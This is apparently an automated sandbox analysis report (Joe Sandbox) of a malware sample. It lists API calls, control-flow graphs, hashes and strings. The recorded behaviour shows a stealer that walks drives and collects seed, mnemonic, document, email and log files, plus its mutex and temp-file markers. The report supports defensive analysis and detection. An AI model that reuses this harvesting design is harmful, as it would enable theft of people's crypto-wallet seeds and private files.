                                                                                                                                                                                                                                                    • Instruction ID: 68914308d25dd2683d267fc8216080732a8ffd61b566a35454427b50c537f0a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8251463091CA254AE33CA67888D9278B7E0F78130AF34055ED0F7C5993ED25D68B87A3

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AcceptConnectPort$MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2923266908-0
                                                                                                                                                                                                                                                    • Opcode ID: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                    • Instruction ID: 42bfa32747f7340b5441cfd0e731924346e8608d8e1add8fe67abe2639575ab7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9941DF30208B488FDB54EF6C98C97957B91EB55320F0443AEE85ECB2D7DE34C9498796

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 118 270f66715c0-270f66715f2 119 270f66715f4-270f66715f7 118->119 120 270f66715f9-270f66715fb 118->120 121 270f667161f-270f667166d NtAcceptConnectPort 119->121 122 270f66715fd-270f6671609 120->122 123 270f667160b-270f667160d 120->123 122->121 124 270f667160f-270f667161b 123->124 125 270f667161d 123->125 124->121 125->121
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,00000270F6671E3A), ref: 00000270F6671654
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1658770261-0
                                                                                                                                                                                                                                                    • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                    • Instruction ID: fe6e3d6b9c83aa0fd67f2443d1e31a5af1653a29d19894cd258fec8efd18bca9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B213E71518B088FDB58DF58C4C9A6AF7E1FB68309F180A6FE44AC6660DB31D589CB42

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 95 270f6671870-270f66718a0 call 270f66708a4 * 2 100 270f66718a6-270f66718a9 95->100 101 270f6671954-270f667195b 95->101 100->101 102 270f66718af-270f66718b9 100->102 102->101 103 270f66718bf-270f66718c4 102->103 103->101 104 270f66718ca-270f66718d7 103->104 104->101 105 270f66718d9-270f66718e1 104->105 105->101 106 270f66718e3-270f66718ee 105->106 106->101 107 270f66718f0-270f66718f7 106->107 107->101 108 270f66718f9-270f66718fc 107->108 108->101 109 270f66718fe-270f6671906 108->109 109->101 110 270f6671908-270f667190b 109->110 110->101 111 270f667190d-270f6671916 110->111 111->101 112 270f6671918-270f667191c 111->112 112->101 113 270f667191e-270f667192e 112->113 113->101 115 270f6671930-270f6671947 GetProcessMitigationPolicy 113->115 115->101 116 270f6671949-270f667194e 115->116 116->101 117 270f6671950-270f6671951 116->117 117->101
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                    • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                    • Instruction ID: f0a3aa3d4d3f65a7c48c809726b39d669f2aa80f3d1b3806f1bc7cbab66d451d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15317A30118A07CAEBB597A8C4D87F1B2E5EBA431AF2801AAC419D75D1EE75C5CEC641
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                    • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCR90 ref: 001D1A61
                                                                                                                                                                                                                                                    • memset.MSVCR90 ref: 001D1A77
                                                                                                                                                                                                                                                    • PathCombineW.SHLWAPI(?,msocache,001DA264), ref: 001D1A8F
                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 001D1AA3
                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,001DA268), ref: 001D1AD3
                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,001DA26C), ref: 001D1AE9
                                                                                                                                                                                                                                                    • PathCombineW.SHLWAPI(?,msocache,?), ref: 001D1B05
                                                                                                                                                                                                                                                    • CharLowerW.USER32(?), ref: 001D1B39
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.txt), ref: 001D1BA8
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.doc), ref: 001D1BC2
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.rtf), ref: 001D1BDC
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.csv), ref: 001D1BF6
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.md), ref: 001D1C10
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.mnemonic), ref: 001D1C2A
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.json), ref: 001D1C44
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.pdf), ref: 001D1C5E
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.seed), ref: 001D1C74
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.eml), ref: 001D1C8A
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.msg), ref: 001D1CA0
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.log), ref: 001D1CB6
                                                                                                                                                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.mbox), ref: 001D1CCC
                                                                                                                                                                                                                                                    • PathCombineW.SHLWAPI(?,msocache,?), ref: 001D1CE8
                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(000000FF,?), ref: 001D1D0B
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 001D1D20
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Path$MatchSpec$Combine$FileFindlstrcmpmemset$CharCloseFirstHandleLowerNext
                                                                                                                                                                                                                                                    • String ID: $recycle.bin$*.csv$*.doc$*.eml$*.json$*.log$*.mbox$*.md$*.mnemonic$*.msg$*.pdf$*.rtf$*.seed$*.txt$boot$intel$msocache$perflogs$windows
                                                                                                                                                                                                                                                    • API String ID: 3613755899-1169052343
                                                                                                                                                                                                                                                    • Opcode ID: 1e24e6ae73d685792dc453a730fb889eb6d70407a871f1c6e690a3b59ccb48a1
                                                                                                                                                                                                                                                    • Instruction ID: e79bff00f382358a05a24c351d1eab97779e39c722c3b024c6854e6deec92b36
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e24e6ae73d685792dc453a730fb889eb6d70407a871f1c6e690a3b59ccb48a1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 527173B1A42219BBCB20DFA1DD88BDD7778BF14700F44859BE619A2240E774DB88CF56

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 001D1F69
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,hh6657577447), ref: 001D1F78
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 001D1F81
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 001D1F90
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00001EF0,00000000,00000000,00000000), ref: 001D1FB1
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 001D1FBC
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 001D1FCC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$Create$ErrorExitLastMutexProcessThread
                                                                                                                                                                                                                                                    • String ID: hh6657577447
                                                                                                                                                                                                                                                    • API String ID: 302559243-755765026
                                                                                                                                                                                                                                                    • Opcode ID: 474c775d50cdd40512399787e9411c2ba1638de91440af818473b88a34cc6723
                                                                                                                                                                                                                                                    • Instruction ID: b18036b30ba066bce58033858c6122cca114834ce9da203513cd51ce45300613
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474c775d50cdd40512399787e9411c2ba1638de91440af818473b88a34cc6723
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68F01234A87300B7E3102BE09D4FB197771AB15B52F100013F715B89D0CBA4A6444A27

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 45 1d1300-1d1325 call 1d2010 _wfopen 48 1d151b-1d1520 45->48 49 1d132b-1d1345 fgetws 45->49 50 1d150f-1d1518 fclose 49->50 51 1d134b-1d1391 call 1d11b0 call 1d1120 49->51 50->48 57 1d150a 51->57 58 1d1397-1d13aa 51->58 57->49 59 1d1505 58->59 60 1d13b0-1d13ea memset wcstok 58->60 59->57 61 1d13f4-1d13fb 60->61 62 1d13fd-1d1410 61->62 63 1d144b-1d1466 call 1d1280 61->63 62->63 65 1d1412-1d1449 wcstok 62->65 67 1d146c-1d1499 memset 63->67 68 1d1503 63->68 65->61 69 1d14aa-1d14b6 67->69 68->57 70 1d14b8-1d14bf 69->70 71 1d14f4-1d1500 call 1d10a0 69->71 72 1d14d5-1d14f2 wcscat 70->72 73 1d14c1-1d14d2 wcscat 70->73 71->68 72->69 73->72
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: iswspacememsetwcscatwcstok$_wfopenfclosefgetws
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3041731120-0
                                                                                                                                                                                                                                                    • Opcode ID: 4c2dfef7e6abe73e84ead93fa3a886351be37c550b53791ef0be1e323b5eca82
                                                                                                                                                                                                                                                    • Instruction ID: b5f1a654321cb6fd372122a5c43781e93ca6b968c5826b486d4df6b3e11537ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c2dfef7e6abe73e84ead93fa3a886351be37c550b53791ef0be1e323b5eca82
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C5169B1C00228BADB24DB50DC46BD973B8BF54300F04C0A6E40966341EB759BDADFE2

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 001D101A
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 001D1033
                                                                                                                                                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 001D1043
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 001D1069
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 001D1085
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                                                                    • String ID: %s\f7f7ff7ffd6.txt$%temp%
                                                                                                                                                                                                                                                    • API String ID: 750032643-3186088261
                                                                                                                                                                                                                                                    • Opcode ID: f05840a501c20a3aba7b2fa312e3b8145a0b1271181245bacc45363d070479fb
                                                                                                                                                                                                                                                    • Instruction ID: 944a23433c53c2a4cbd1cd40b67c57abfc7603f2a76a5e5150bec7988d214b61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f05840a501c20a3aba7b2fa312e3b8145a0b1271181245bacc45363d070479fb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD01A7B054131CBBD720DB609C4AFE67338AB40704F0046A5B725961D1DBB05AC4DFA6

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 83 1d1e30-1d1e5b GetLogicalDrives 84 1d1e66-1d1e6a 83->84 85 1d1e6c-1d1e8c RegOpenKeyExW 84->85 86 1d1ed6-1d1ee1 84->86 87 1d1e8e-1d1eb9 RegQueryValueExW 85->87 88 1d1ed4 85->88 89 1d1ebb-1d1ebf 87->89 90 1d1eca-1d1ece RegCloseKey 87->90 88->84 89->90 92 1d1ec1-1d1ec7 89->92 90->88 92->90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNELBASE ref: 001D1E36
                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 001D1E84
                                                                                                                                                                                                                                                    • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 001D1EB1
                                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?), ref: 001D1ECE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 001D1E77
                                                                                                                                                                                                                                                    • NoDrives, xrefs: 001D1EA8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                                                                                                                                    • Opcode ID: 914213859fbf02d81dba0799110a3d6b1d1c1d9082e0d91c3544f6970be1a183
                                                                                                                                                                                                                                                    • Instruction ID: b98f5122bc037286e0a7ad2d9e4fbd9d13403e9602569165bb69c66fceed131f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 914213859fbf02d81dba0799110a3d6b1d1c1d9082e0d91c3544f6970be1a183
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2411DA71E4120AEBDB14CFD5C949BFEBBB5FB48704F10850AE921A7280D7786A45CF91

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 93 1d1db0-1d1dd6 GetDriveTypeW 94 1d1dd8-1d1ddf 93->94 95 1d1e25-1d1e2b 93->95 96 1d1dec-1d1e04 QueryDosDeviceW 94->96 97 1d1de1-1d1de8 94->97 96->95 99 1d1e06-1d1e1c StrCmpNW 96->99 97->96 98 1d1dea 97->98 98->95 99->95 100 1d1e1e 99->100 100->95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNELBASE(001D1D8F), ref: 001D1DBD
                                                                                                                                                                                                                                                    • QueryDosDeviceW.KERNELBASE(001D1D8F,?,00000208), ref: 001D1DFC
                                                                                                                                                                                                                                                    • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 001D1E14
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                    • String ID: \??\
                                                                                                                                                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                    • Opcode ID: ee374f4c070dc330bef8b8a5920575e5636d2292eb6f8ac55509376e0454b8c7
                                                                                                                                                                                                                                                    • Instruction ID: 25edc793303f9fd8dac72853e8f9269f427bb3d9562e74bbf6e533a9c8872af9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee374f4c070dc330bef8b8a5920575e5636d2292eb6f8ac55509376e0454b8c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A90112B494120CFBCB24DF95DD896D9B7B9AF04705F0080AAEA04A7240D7309FC5CF95

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 101 1d1ef0-1d1f05 call 1d1e30 104 1d1f10-1d1f14 101->104 105 1d1f4f-1d1f51 ExitThread 104->105 106 1d1f16-1d1f37 call 1d1d50 104->106 109 1d1f4d 106->109 110 1d1f39-1d1f3d 106->110 109->104 111 1d1f3f 110->111 112 1d1f41-1d1f45 call 1d1a20 110->112 111->109 115 1d1f4a 112->115 115->109
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 001D1E30: GetLogicalDrives.KERNELBASE ref: 001D1E36
                                                                                                                                                                                                                                                      • Part of subcall function 001D1E30: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 001D1E84
                                                                                                                                                                                                                                                      • Part of subcall function 001D1E30: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 001D1EB1
                                                                                                                                                                                                                                                      • Part of subcall function 001D1E30: RegCloseKey.KERNELBASE(?), ref: 001D1ECE
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 001D1F51
                                                                                                                                                                                                                                                      • Part of subcall function 001D1D50: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 001D1DA3
                                                                                                                                                                                                                                                      • Part of subcall function 001D1A20: memset.MSVCR90 ref: 001D1A61
                                                                                                                                                                                                                                                      • Part of subcall function 001D1A20: memset.MSVCR90 ref: 001D1A77
                                                                                                                                                                                                                                                      • Part of subcall function 001D1A20: PathCombineW.SHLWAPI(?,msocache,001DA264), ref: 001D1A8F
                                                                                                                                                                                                                                                      • Part of subcall function 001D1A20: FindFirstFileW.KERNELBASE(?,?), ref: 001D1AA3
                                                                                                                                                                                                                                                      • Part of subcall function 001D1A20: lstrcmpW.KERNEL32(?,001DA268), ref: 001D1AD3
                                                                                                                                                                                                                                                      • Part of subcall function 001D1A20: lstrcmpW.KERNEL32(?,001DA26C), ref: 001D1AE9
                                                                                                                                                                                                                                                      • Part of subcall function 001D1A20: PathCombineW.SHLWAPI(?,msocache,?), ref: 001D1B05
                                                                                                                                                                                                                                                      • Part of subcall function 001D1A20: FindNextFileW.KERNELBASE(000000FF,?), ref: 001D1D0B
                                                                                                                                                                                                                                                      • Part of subcall function 001D1A20: CloseHandle.KERNELBASE(000000FF), ref: 001D1D20
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCombineFileFindPathlstrcmpmemset$DrivesExitFirstHandleLogicalNextOpenQueryThreadValuelstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 717983626-0
                                                                                                                                                                                                                                                    • Opcode ID: 0048c276c55be94f7f385b2fcf54477f94869bda82b2460ccba7ad9156bf35ab
                                                                                                                                                                                                                                                    • Instruction ID: 531a8beeb0f5a1ee4d9fcf417954ddd094fc2ae5036d1ed13152afe3e15c78d0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0048c276c55be94f7f385b2fcf54477f94869bda82b2460ccba7ad9156bf35ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB013CB5C04208FBCB04DBE4C946ADEBBB5AB18304F1040ABE405B3301E331AA88CB56

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
